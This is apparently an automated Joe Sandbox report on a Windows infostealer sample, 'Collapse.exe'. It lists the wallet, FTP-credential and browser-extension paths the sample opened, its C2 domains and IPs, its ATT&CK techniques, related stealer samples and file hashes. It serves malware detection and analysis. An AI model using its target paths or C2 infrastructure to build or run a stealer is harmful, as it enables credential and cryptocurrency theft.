                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior

                          Remote Access Functionality

Source: Yara match | File source: 1.2.Collapse.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Collapse.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Collapse.exe.42f9550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.3294762708.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: Collapse.exe, type: SAMPLE
Source: Yara match | File source: 0.0.Collapse.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Collapse.exe.42f9550.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Collapse.exe.42f9550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2033769866.0000000000F42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix

Techniques are listed per tactic column. A number in parentheses is the match-count badge carried over from the original matrix; techniques without a number are the unmatched template entries shown for reference.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation (12); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (211); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Virtualization/Sandbox Evasion (23); Disable or Modify Tools (1); Process Injection (211); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (3); Software Packing (11); Timestomp (1); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Query Registry (1); Security Software Discovery (231); Virtualization/Sandbox Evasion (23); Process Discovery (1); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (22); System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (11); Data from Local System (41); Clipboard Data (3); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (21); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (114); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label
Collapse.exe | 56% | Virustotal |
                          No Antivirus matches
                          No Antivirus matches
                          No Antivirus matches
Source | Detection | Scanner | Label
https://sdfwfsdf.icu/z | 0% | Avira URL Cloud | safe
sdfwfsdf.icu | 0% | Avira URL Cloud | safe
https://sdfwfsdf.icu/r | 0% | Avira URL Cloud | safe
https://sdfwfsdf.icu/0y | 0% | Avira URL Cloud | safe
phygcsforum.life | 100% | Avira URL Cloud | malware
https://sdfwfsdf.icu/4 | 0% | Avira URL Cloud | safe
https://sdfwfsdf.icu/apiuo | 0% | Avira URL Cloud | safe
https://sdfwfsdf.icu/api | 0% | Avira URL Cloud | safe
moderzysics.top | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
t.me | 149.154.167.99 | true | false | | high
sdfwfsdf.icu | 188.114.97.3 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
moderzysics.top | true | Avira URL Cloud: malware | unknown
techspherxe.top | false | | high
https://t.me/kz_prokla1 | false | | high
https://sdfwfsdf.icu/api | true | Avira URL Cloud: safe | unknown
phygcsforum.life | true | Avira URL Cloud: malware | unknown
techmindzs.live | false | | high
gadgethgfub.icu | false | | high
sdfwfsdf.icu | true | Avira URL Cloud: safe | unknown
codxefusion.top | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://sdfwfsdf.icu/0y | Collapse.exe, 00000001.00000002.3295516080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://sdfwfsdf.icu/apiuo | Collapse.exe, 00000001.00000002.3295956102.0000000001757000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://upx.sf.net | Amcache.hve.4.dr | false | | high
https://sdfwfsdf.icu/4 | Collapse.exe, 00000001.00000002.3295883257.0000000001746000.00000004.00000020.00020000.00000000.sdmp; Collapse.exe, 00000001.00000002.3295516080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://sdfwfsdf.icu/r | Collapse.exe, 00000001.00000002.3295516080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://sdfwfsdf.icu/z | Collapse.exe, 00000001.00000002.3295883257.0000000001746000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.97.3 | sdfwfsdf.icu | European Union | 13335 | CLOUDFLARENETUS | true
149.154.167.99 | t.me | United Kingdom | 62041 | TELEGRAMRU | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1630105
Start date and time: 2025-03-05 14:56:27 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 2s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Collapse.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@4/5@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 29
• Number of non-executed functions: 47
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 104.208.16.94, 40.126.31.129, 52.149.20.212, 13.107.246.76
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
08:57:21 | API Interceptor | 8x Sleep call for process: Collapse.exe modified
08:57:37 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          188.114.97.3r_BBVA_MensajeSWIFT04-03-2025-PDF.exeGet hashmaliciousFormBookBrowse
                                          • www.timeinsardinia.info/50g8/
                                          https://u.to/8eAUIgGet hashmaliciousHTMLPhisherBrowse
                                          • staemconmmuntiy.com/gift/id=746904
                                          rRFQ24A.exeGet hashmaliciousFormBookBrowse
                                          • www.sld6.rest/q0rl/
                                          VibeCall.exeGet hashmaliciousRHADAMANTHYSBrowse
                                          • rustaisolutionnorisk.com/downloads/videosolution_vibecall_b.exe
                                          VibeCall.exeGet hashmaliciousRHADAMANTHYSBrowse
                                          • rustaisolutionnorisk.com/downloads/videosolution_vibecall_b.exe
                                          VibeCall.exeGet hashmaliciousRHADAMANTHYSBrowse
                                          • rustaisolutionnorisk.com/downloads/videosolution_vibecall_b.exe
                                          VibeCall.exeGet hashmaliciousRHADAMANTHYSBrowse
                                          • rustaisolutionnorisk.com/downloads/videosolution_vibecall_b.exe
                                          WMnMQH4voD.exeGet hashmaliciousGhostRatBrowse
                                          • td49t43g.com/1/t4.bmp
                                          http://aptbusinessservices.com.au/Get hashmaliciousUnknownBrowse
                                          • aptbusinessservices.com.au/
                                          http://uploads-ssl.webflow.com/660018002a32edee7a11d41b/66335b965a5a96f03bd82400_kasuwidavogog.pdfGet hashmaliciousUnknownBrowse
                                          • melurilexuki.urseghy.com/favicon.ico
                                          149.154.167.99http://45.142.208.144.sslip.io/blog/Get hashmaliciousUnknownBrowse
                                          • telegram.org/img/emoji/40/F09F9889.png
                                          http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                          • telegram.org/img/favicon.ico
                                          http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                          • telegram.org/
                                          http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                          • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                          http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                          • telegram.org/
                                          http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                          • telegram.org/
                                          http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                          • telegram.org/?setln=pl
                                          http://makkko.kz/Get hashmaliciousUnknownBrowse
                                          • telegram.org/
                                          http://telegram.dogGet hashmaliciousUnknownBrowse
                                          • telegram.dog/
                                          LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                          • t.me/cinoshibot
Match | Associated Sample Name / URL | Detection | Threat Name (context listed beneath each row)
t.me | q3na5Mc.exe | malicious | Vidar
• 149.154.167.99
t.me | Yanto v1.2.exe | malicious | LummaC Stealer
• 149.154.167.99
t.me | ESVoO7ywn5.exe | malicious | Vidar
• 149.154.167.99
t.me | S2W2ftXM2b.exe | malicious | Amadey, LummaC Stealer, PureLog Stealer, XWorm
• 149.154.167.99
t.me | dealmaker.exe | malicious | LummaC Stealer
• 149.154.167.99
t.me | windows.ps1 | malicious | PureLog Stealer, Vidar
• 149.154.167.99
t.me | build.exe | malicious | PureLog Stealer, Vidar
• 149.154.167.99
t.me | q3na5Mc.exe | malicious | Vidar
• 149.154.167.99
t.me | brinkmanship-mlw.ps1 | malicious | Vidar
• 149.154.167.99
t.me | KMSpico.exe | malicious | LummaC Stealer
• 149.154.167.99
sdfwfsdf.icu | Yanto v1.2.exe | malicious | LummaC Stealer
• 188.114.97.3
Match | Associated Sample Name / URL | Detection | Threat Name (context listed beneath each row)
TELEGRAMRU | 20250301_173245__P20250301_173245__P.exe | malicious | CryptOne, Snake Keylogger, VIP Keylogger
• 149.154.167.220
TELEGRAMRU | q3na5Mc.exe | malicious | Vidar
• 149.154.167.99
TELEGRAMRU | MARCH SHIPMENT PLAN DOCS.exe | malicious | Snake Keylogger, VIP Keylogger
• 149.154.167.220
TELEGRAMRU | DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | malicious | MSIL Logger, MassLogger RAT
• 149.154.167.220
TELEGRAMRU | BBVA-P53269 .pdf.exe | malicious | Unknown
• 149.154.167.220
TELEGRAMRU | Purchase-New Order PO.exe | malicious | Snake Keylogger, VIP Keylogger
• 149.154.167.220
TELEGRAMRU | Cb523jmji0.exe | malicious | Unknown
• 149.154.167.220
TELEGRAMRU | delivery894639203.html | malicious | HTMLPhisher
• 149.154.167.220
TELEGRAMRU | SfbAu0ICZn.exe | malicious | DCRat, PureLog Stealer, zgRAT
• 149.154.167.220
TELEGRAMRU | Yanto v1.2.exe | malicious | LummaC Stealer
• 149.154.167.99
CLOUDFLARENETUS | Zamowienie_522025.exe | malicious | FormBook, GuLoader
• 104.21.94.11
CLOUDFLARENETUS | FW_ Sam Coon shared _03-04-2025 rabofla_pdf_ with you.msg | malicious | Unknown
• 1.1.1.1
CLOUDFLARENETUS | https://grzegorztopyla.simvoly.com/?preview=__PREVIEW_ONLY | malicious | HTMLPhisher
• 104.18.11.207
CLOUDFLARENETUS | http://www.creditsafe.com/de/de.html | malicious | Unknown
• 104.17.25.14
CLOUDFLARENETUS | https://www.bing.com/ck/a?!&&p=03393a15f6ac2f3e18e9a53e23664491f88e763b1b1f8dfe8ed088a707d16975JmltdHM9MTc0MTA0NjQwMA&ptn=3&ver=2&hsh=4&fclid=2041c032-4fae-62e3-26ce-d55e4e1e63be&u=a1aHR0cHM6Ly93d3cuc3VubmlhY2FkZW15LmNvbS90YWcvcXVyYW4tcGFkaG5hLXNpa2hlLw&ntb=1 | malicious | HTMLPhisher, Invisible JS
• 1.1.1.1
CLOUDFLARENETUS | Payment Advice.exe | malicious | MSIL Logger, MassLogger RAT
• 104.21.80.1
CLOUDFLARENETUS | cbr.arm.elf | malicious | Mirai
• 1.4.15.178
CLOUDFLARENETUS | output.cmd | malicious | AgentTesla, Batch Injector, Discord Token Stealer
• 172.67.74.152
CLOUDFLARENETUS | https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?usp=sharing_eip&ts=67c8321f | malicious | HTMLPhisher, Invisible JS
• 104.17.25.14
CLOUDFLARENETUS | https://x3g.tcyoopxg.ru/eNDiSHVinaTEN/ | malicious | HTMLPhisher, Invisible JS
• 104.16.2.189
Match | Associated Sample Name / URL | Detection | Threat Name (context listed beneath each row)
a0e9f5d64349fb13191bc781f81f42e1 | alex2022.exe | malicious | LummaC Stealer
• 188.114.97.3
• 149.154.167.99
a0e9f5d64349fb13191bc781f81f42e1 | wBalaPT.exe | malicious | LummaC Stealer, PureLog Stealer
• 188.114.97.3
• 149.154.167.99
a0e9f5d64349fb13191bc781f81f42e1 | random(6).exe | malicious | LummaC Stealer, PureLog Stealer
• 188.114.97.3
• 149.154.167.99
a0e9f5d64349fb13191bc781f81f42e1 | random(7).exe | malicious | LummaC Stealer
• 188.114.97.3
• 149.154.167.99
a0e9f5d64349fb13191bc781f81f42e1 | random(2).exe | malicious | LummaC Stealer
• 188.114.97.3
• 149.154.167.99
a0e9f5d64349fb13191bc781f81f42e1 | random(3).exe | malicious | LummaC Stealer
• 188.114.97.3
• 149.154.167.99
a0e9f5d64349fb13191bc781f81f42e1 | JqGBbm7.exe | malicious | LummaC Stealer
• 188.114.97.3
• 149.154.167.99
a0e9f5d64349fb13191bc781f81f42e1 | MCxU5Fj.exe | malicious | LummaC Stealer, PureLog Stealer
• 188.114.97.3
• 149.154.167.99
a0e9f5d64349fb13191bc781f81f42e1 | GMOgZgNpNu.exe | malicious | Amadey, LummaC Stealer
• 188.114.97.3
• 149.154.167.99
a0e9f5d64349fb13191bc781f81f42e1 | xIwQcY1fc4.exe | malicious | Amadey, GCleaner, LummaC Stealer, PureLog Stealer
• 188.114.97.3
• 149.154.167.99
                                          No context
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):0.8886052502408956
                                          Encrypted:false
                                          SSDEEP:192:H4fVo4GgaVuiGA0LR3EaWGzuiFAZ24IO8H:YfVo4GgmuiGbLR3Ea3zuiFAY4IO8H
                                          MD5:F8FDE9331436869AC8AED20EA82634F8
                                          SHA1:57A1AA0B19172F910EF1630171F0CF2C00B31950
                                          SHA-256:20952036DBAE5ED00E6C3D65D66E8D0877385D7F30BAFCDBF23E15155FC45233
                                          SHA-512:BEFC8986355B32E24F669684DD6CA363868F74636451476E8505657548C142EB435E0C57698BE32333ECD2F60765A486CBBD223FFE77FF3DC43831D04E303662
                                          Malicious:true
                                          Reputation:low
                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.5.6.5.6.6.3.8.0.8.0.8.7.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.5.6.5.6.6.3.8.5.9.6.5.0.7.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.f.8.a.2.b.4.0.-.c.f.a.1.-.4.c.2.2.-.9.e.0.b.-.9.f.b.e.c.e.5.f.6.1.1.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.a.6.0.7.3.3.9.-.4.b.b.9.-.4.8.6.b.-.a.a.b.1.-.f.c.d.4.7.7.6.c.c.2.9.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.C.o.l.l.a.p.s.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.l.i.t.i.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.9.8.-.0.0.0.1.-.0.0.1.4.-.a.8.4.3.-.a.9.8.1.d.6.8.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.e.d.2.2.a.c.4.e.5.d.4.5.6.1.a.7.5.a.6.a.e.1.6.5.c.5.8.4.3.1.c.0.0.0.0.0.0.0.0.!.0.0.0.0.b.3.4.a.d.a.7.4.3.e.5.e.4.e.d.6.b.3.4.a.e.2.8.9.4.b.0.5.7.f.8.d.f.7.5.e.f.b.7.1.!.C.o.
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Mini DuMP crash report, 15 streams, Wed Mar 5 13:57:18 2025, 0x1205a4 type
                                          Category:dropped
                                          Size (bytes):154966
                                          Entropy (8bit):3.7818204702271223
                                          Encrypted:false
                                          SSDEEP:1536:2Bq5zuBojRvpN4uE2aOILTguvAwU88pbTT3dOU4qjtTqCD9dNUjDs:2Azf4uEqILTgBN4Gd3Nk
                                          MD5:67002A2AF2247791C3C72C2E528A3022
                                          SHA1:27BDBF8073E433611CE42571BC90D9DD19EC1F1B
                                          SHA-256:0D624606BF6C3DB45788876BD35CB04AC65E160A0CA5E00F5060230604BF739C
                                          SHA-512:16965703EFDC0AFE2517062C9AFF5FAA1FFD446AB3309B4991CE771079D56D3E234D61E25BD75EAF5A986DCA78F560C92E44E9FFEB9282DDB03BCC7F6ED0CF85
                                          Malicious:false
                                          Reputation:low
                                          Preview:MDMP..a..... .......>X.g....................................$................/..........`.......8...........T...........($...9......................................................................................................eJ......P.......GenuineIntel............T...........=X.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):8378
                                          Entropy (8bit):3.6897253708418156
                                          Encrypted:false
                                          SSDEEP:192:R6l7wVeJX961T6YEIASUaigmffVJzprt89bQOsfDfEQm:R6lXJN6x6YEfSUaigmffVJEQNfDfC
                                          MD5:733C2521AC3140DAC2D9D81322DABD7E
                                          SHA1:65AFE6725D479B5700813A666231AAA5E4F015B6
                                          SHA-256:702C42551236C209409E4F70A080C141111F17F8CC342BED57ADC1D48BE7E388
                                          SHA-512:790996C4E7B4727F50E1FCA4BCF85BB1563BFF059251CC1E5908AFBDDE0FD6EC344AB4BE6111544B320E5458A42ACA98AD3B320053E3CCFA0DCC16FF973455C2
                                          Malicious:false
                                          Reputation:low
                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.7.6.0.<./.P.i.
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):4740
                                          Entropy (8bit):4.440337519675697
                                          Encrypted:false
                                          SSDEEP:48:cvIwWl8zsuJg77aI9YrWpW8VY6Ym8M4JAdxPcf6FR+q8vkdxPcfUOSxvIMM5Cd:uIjfkI7Ka7V6JRfaKVfUOSxvIMM5Cd
                                          MD5:B08802DC3D0E1EB8A560715164692946
                                          SHA1:8D20A9670ECD1E9C2E207848A97BFA4A44142941
                                          SHA-256:E4376A7CB322448133AEFB9529A461FA595911C120839EF335E40A747C400DC6
                                          SHA-512:30CC45C89773D472E676E25EA0BB5A9D9DF1F35A0441D28F5C7C62BF40E48D58CCA054D7B54E2158F971F4C1E78C463D0051C685616DCBCDB04C903A8F76E8E7
                                          Malicious:false
                                          Reputation:low
                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="747659" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:MS Windows registry file, NT/2000 or above
                                          Category:dropped
                                          Size (bytes):1835008
                                          Entropy (8bit):4.4217244767449495
                                          Encrypted:false
                                          SSDEEP:6144:ySvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNa0uhiTw9:BvloTMW+EZMM6DFyg03w9
                                          MD5:EC7A67661E2DDBA9F7DB80B58D6449A9
                                          SHA1:3CC709A4264BAC5618CFEBBD1DCF821106AF7012
                                          SHA-256:2978565BEF7062F4E7FB63AA5C2A803E431E3C8CA23908A702017D6F6B757BEF
                                          SHA-512:A2D3C6FC5EB57FFABA354EFA3F64DF7DFEDBB05350D82791540BD4263DD017DF6F061D1194133AF131E0137AD51EA04F60B571242FF8E3FA716095B6A4D3DA98
                                          Malicious:false
                                          Reputation:low
                                          Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.912331822794405
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          File name:Collapse.exe
                                          File size:425'984 bytes
                                          MD5:04eacc602d626eba16224fdc15ef8aa5
                                          SHA1:b34ada743e5e4ed6b34ae2894b057f8df75efb71
